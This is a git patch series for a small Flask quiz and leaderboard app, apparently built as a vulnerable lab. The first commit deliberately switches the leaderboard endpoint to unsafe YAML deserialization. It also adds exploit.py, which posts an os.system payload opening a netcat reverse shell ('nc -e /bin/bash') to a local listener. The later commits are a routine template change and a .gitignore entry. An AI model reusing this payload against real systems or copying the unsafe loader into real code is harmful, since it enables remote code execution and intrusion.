From adcb48800c2104476d245d578a820ba1daf04347 Mon Sep 17 00:00:00 2001 From: furtest Date: Fri, 5 Dec 2025 04:51:03 +0100 Subject: [PATCH 1/3] Working exploit and vuln --- exploit.py | 11 +++++++++++ flask_base/app.py | 14 ++++++++++++-- 2 files changed, 23 insertions(+), 2 deletions(-) create mode 100644 exploit.py diff --git a/exploit.py b/exploit.py new file mode 100644 index 0000000..be244c8 --- /dev/null +++ b/exploit.py @@ -0,0 +1,11 @@ +import requests + +malicious_yaml = """ +!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"] +""" +url = "http://127.0.0.1:8080/api/leaderboard" +headers = { + "Content-Type": "text/yaml" +} +response = requests.post(url, headers=headers, data=malicious_yaml) +print(response.text) diff --git a/flask_base/app.py b/flask_base/app.py index ed0543d..5651b8a 100644 --- a/flask_base/app.py +++ b/flask_base/app.py @@ -13,17 +13,27 @@ if not os.path.exists(LEADERBOARD_FILE): def read_leaderboard(): with open(LEADERBOARD_FILE, 'r') as f: - return yaml.load(f, Loader=yaml.UnsafeLoader) or [] + return yaml.safe_load(f) or [] def write_leaderboard(data): + print(data) with open(LEADERBOARD_FILE, 'w') as f: yaml.safe_dump(data, f) @app.route('/api/leaderboard', methods=['POST']) def add_to_leaderboard(): - new_entry = request.json + if request.content_type == 'text/yaml' or request.content_type == 'application/yaml': + try: + new_entry = yaml.load(request.data, Loader=yaml.UnsafeLoader) + except yaml.YAMLError: + return jsonify({'error': 'Invalid YAML format'}), 400 + else: + new_entry = request.json + + print(new_entry) if not new_entry or 'name' not in new_entry or 'score' not in new_entry: return jsonify({'error': 'Name and score are required'}), 400 + leaderboard = read_leaderboard() leaderboard.append(new_entry) write_leaderboard(leaderboard) From ec1a69580184d02dc1adedad5c40547bae7f34df Mon Sep 17 00:00:00 2001 From: furtest Date: Fri, 5 Dec 2025 05:15:23 +0100 Subject: [PATCH 2/3] =?UTF-8?q?R=C3=A9pare=20le=20pokemon?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- flask_base/app.py | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/flask_base/app.py b/flask_base/app.py index 9c6e3f3..79c7b0d 100644 --- a/flask_base/app.py +++ b/flask_base/app.py @@ -38,19 +38,18 @@ def get_leaderboard(): @app.route('/questions') def show_questions(): with open('./data/quizz.json', 'r') as file: - #questions = json.load(file)["outils_list"] questions = json.load(file) return render_template('quiz.html', questions=questions) - - @app.route('/') def main(): return render_template('index.html') @app.route('/pokemon') def poke(): - return render_template('pokemon.html') + with open('./data/softwares.json', 'r') as file: + softwares = json.load(file)["outils_list"] + return render_template('pokemon.html', data=softwares) @app.route('/PAI') def pai(): From a121c472db2a4d77ee413462cb87e2d0531863d3 Mon Sep 17 00:00:00 2001 From: furtest Date: Fri, 5 Dec 2025 05:32:26 +0100 Subject: [PATCH 3/3] Ignore scoreboard changes --- .gitignore | 1 + 1 file changed, 1 insertion(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..50a0482 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +leaderboard.yaml